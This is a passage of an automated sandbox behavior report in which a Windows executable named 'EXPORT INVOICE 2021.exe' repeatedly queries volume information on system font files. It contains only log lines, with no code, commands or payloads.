          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
